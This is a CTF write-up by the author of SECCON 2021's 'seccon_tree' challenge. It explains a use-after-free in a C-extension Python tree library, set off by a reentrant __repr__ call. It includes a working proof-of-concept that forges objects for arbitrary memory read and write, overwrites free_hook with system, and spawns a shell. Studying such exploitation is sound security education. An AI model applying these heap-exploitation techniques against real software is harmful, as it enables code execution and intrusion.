# [SECCON CTF 2021] seccon_tree writeup (Pwn, 4 solves) @moratorium08
## Overview of the program
A python library written in C is given. This library provides a Tree-like data structure and apis for you to handle the structure like creating a Tree, adding a child node to a parent node, finding a node by "name", and so on. I extracted below some important parts of the library's implementation: user-defined Python's Object, `add_child_left` and `find_node`.
```c=
typedef long long int lli;
typedef struct {
PyObject_HEAD
PyObject *object;
PyObject *left;
PyObject *right;
} Tree;
static PyObject*
add_child_left(Tree *self, PyObject *args) {
PyObject *obj;
if (!PyArg_ParseTuple(args, "O!", &TreeType, &obj)) {
return NULL;
}
if (self->left != NULL) {
Py_DECREF(self->left);
}
Py_INCREF(obj);
self->left = obj;
Py_RETURN_NONE;
}
Tree* find_node_inner(Tree *self, const char *key) {
Tree* result = NULL;
PyObject* rpr = PyObject_Repr(self->object);
if (rpr == NULL) {
return NULL;
}
const char *label = PyUnicode_AsUTF8(rpr);
if (label == NULL) {
Py_DECREF(rpr);
return NULL;
}
if (strcmp(label, key) == 0) {
result = (Tree *)self;
}
Py_DECREF(rpr);
if (result == NULL && self->left != NULL) {
result = find_node_inner((Tree*)self->left, key);
}
if (result == NULL && self->right != NULL) {
result = find_node_inner((Tree*)self->right, key);
}
return result;
}
static PyObject*
find_node(Tree *self, PyObject *args) {
PyObject *obj;
if (!PyArg_ParseTuple(args, "O", &obj)) {
return NULL;
}
PyObject* rpr = PyObject_Repr(obj);
if (rpr == NULL) {
return NULL;
}
const char *s = PyUnicode_AsUTF8(rpr);
if (s == NULL) {
Py_DECREF(rpr);
return NULL;
}
PyObject* result = (PyObject*)find_node_inner(self, s);
Py_DECREF(rpr);
if (result != NULL) {
Py_INCREF(result);
return result;
}
Py_RETURN_NONE;
}
```
Here is an running example:
```python=
from seccon_tree import Tree
cat = Tree("cat")
lion = Tree("lion")
tiger = Tree("tiger")
cat.add_child_left(lion)
cat.add_child_right(tiger)
assert(cat.find("lion") is not None)
assert(lion.find("tiger") is None)
```
This program creates the following tree:
```
cat
├── lion
└── tiger
```
So, if you search for "lion" from node `cat`, you can find the lion node. However, if you look for "tiger" from node `lion`, you won't find one since there is no lion's children node whose "name" is tiger.
As you may see, the library increments and decrements the reference counter of each object so well that it seems impossible to cause any bugs at a glance.
## The bug
The intended bug exists in `find_node`. In the middle of `find_node`, the library calls `PyObject_Repr(object)` where `object` is an object attached with the corresponding node. `PyObject_Repr(object)` triggers the object's `__repr__` method. If the `__repr__` method manipulates the tree that is currently being scaned, then that could cause a Use-After-Free bug.
Let me explain the concept in more detail by using the following example (Note that programs contain building classes cannot bypass the filter but for now for the simplicity I'm going to use the example):
```python=
from seccon_tree import Tree
a = Tree("a")
class A():
def __repr__(s):
a.add_child_left(Tree("b"))
fake_tree = Tree(1)
fake_tree.add_child_left(Tree("Z"))
print("fake_tree id:", id(fake_tree))
return "A"
a.add_child_left(Tree(A()))
print("old_tree id:", id(a.get_child_left()))
print(a.find("Z") is not None) # should be None. Isn't it?
```
First, we create a tree like
```
"a"
└── A()
```
Then, in the middle of finding a node whose object has name "Z" (there is no such node), `find_node` function triggers `PyObject_Repr(self->object)` to find out what is the name of the object being scanned. However, class A's `__repr__` is overwritten, and it updates the tree's structure.
Focus on the line 7 of the poc. It updates the tree and now the tree has the form
```
"a"
└── "b"
```
and the old node and its object will be freed. That means if we `Tree(1)` as soon as it's freed, we can get the same object from the heap free list.
Here is the stdout of running the above program.
```
$ python example.py
old_tree id: 140499665739136
fake_tree id: 140499665739136
True
```
`old_tree`'s id is the same as `fake_tree`'s. The important thing is that `find_node` is running on the <strong>old</strong> tree. Focus on `find_node_inner` function:
```c=
Tree* find_node_inner(Tree *self, const char *key) {
Tree* result = NULL;
PyObject* rpr = PyObject_Repr(self->object);
if (rpr == NULL) {
return NULL;
}
const char *label = PyUnicode_AsUTF8(rpr);
if (label == NULL) {
Py_DECREF(rpr);
return NULL;
}
if (strcmp(label, key) == 0) {
result = (Tree *)self;
}
Py_DECREF(rpr);
if (result == NULL && self->left != NULL) {
result = find_node_inner((Tree*)self->left, key);
}
if (result == NULL && self->right != NULL) {
result = find_node_inner((Tree*)self->right, key);
}
return result;
}
```
After the call at line 4, `self` has already been freed and re-allocated, so the self now looks like
```
self
└── "Z"
```
So, the result of `a.find("Z") is not None` is `True`.
## How to get shell
The rest things that I have to do is just to create a fake `Tree` which points to some fake object. In my poc,
1. create a fake Tree whose left_children's object points to fake bytearray whose size is 0x7ffffffff at addr 0 (by using this array, we can do arbitrary address read and write).
2. leak `free_hook` and make it point to `system`
3. create a big `/bin/sh` string and free it (the Python allocator uses system's heap when the required size is big)
MyPoC
```python=
def print(*l):
return dbg.Print(*l)
def bytes(x):
return dbg.Bytes(x)
def id(x):
return dbg.Id(x)
def range(*argv):
return dbg.Range(*argv)
def hex(x):
return dbg.Hex(x)
def bytearray(x):
return dbg.Bytearray(x)
def p64(n):
result = []
for i in range(0, 64, 8): result.append((n>>i)&0xff)
return bytes(result)
def u64(n):
res = 0
for x in n[::-1]: res = (res<<8) | x
return res
def pa(x, comment=""):
print(comment, hex(id(x)))
KEY = "KEY"
target_bytes = p64(0x100) + p64(id(bytearray(b"x").__class__)) +p64(0x7fffffffffffffff) + p64(0) * 4
target_bytes_addr = id(target_bytes) + 0x20
pa(target_bytes, "target bytes")
spray = [Tree(1) for i in range(100)]
a = Tree("a")
b = Tree("b")
a.add_child_left(b)
d = Tree("d")
e = Tree("e")
d.add_child_left(e)
bse_addr = id(spray[-1])
pa(spray[-1], "spray")
pa(b, "object b")
e_addr = id(e)
pa(e, "object e")
del e
def get_fake_tree(obj, left, right):
return bytearray(p64(0x100) + \
p64(id(Tree)) + \
p64(obj) + \
p64(left) + p64(right)[:-1])
dummy = Tree(1)
def evil(x):
# fake_tree_2's buf == e
spray = [Tree(1) for i in range(100)]
d.add_child_left(dummy)
dbg.fake_tree_2 = get_fake_tree(id(KEY), 0xcafe,0xbabe)
pa(dbg.fake_tree_2, "fake_tree_2")
# fake_tree's buf == b
spray2 = [Tree(1) for i in range(100)]
a.add_child_left(Tree(1))
dbg.fake_tree = get_fake_tree(0xdead, 0xbeef, e_addr)
pa(dbg.fake_tree, "fake_tree")
return "evil"
dbg.__class__.__repr__ = evil
h = dbg
c = Tree(h)
b.add_child_left(c)
del b
x = a.find(KEY)
dbg.fake_tree_2[16:24] = p64(target_bytes_addr)
p = x.get_object()
stack_check_fail_got = id(Tree) - 0x1e0
print(p[stack_check_fail_got:stack_check_fail_got+8])
x = u64(p[stack_check_fail_got:stack_check_fail_got+8])
print(hex(x))
libc_bse = x - 0x132b00
free_hook = libc_bse + 0x1eeb28
sy_tem = libc_bse + 0x55410
p[free_hook:free_hook+8] = p64(sy_tem)
bytearray(b"/bin/sh\x00" * 400)
```
Thank you for your paticipation!
## The unintended bug
In fact, almost the same thing can be done by `__del__` method. So, I did't have to implement `find_node` method to make the library vulnerable :P
## Writeups
- pql from organizers:
- https://org.anize.rs/SECCON-2021/pwn/seccon_tree
- Using the unintended bug to trigger UAF
- Very elaborate writeup. Thank you!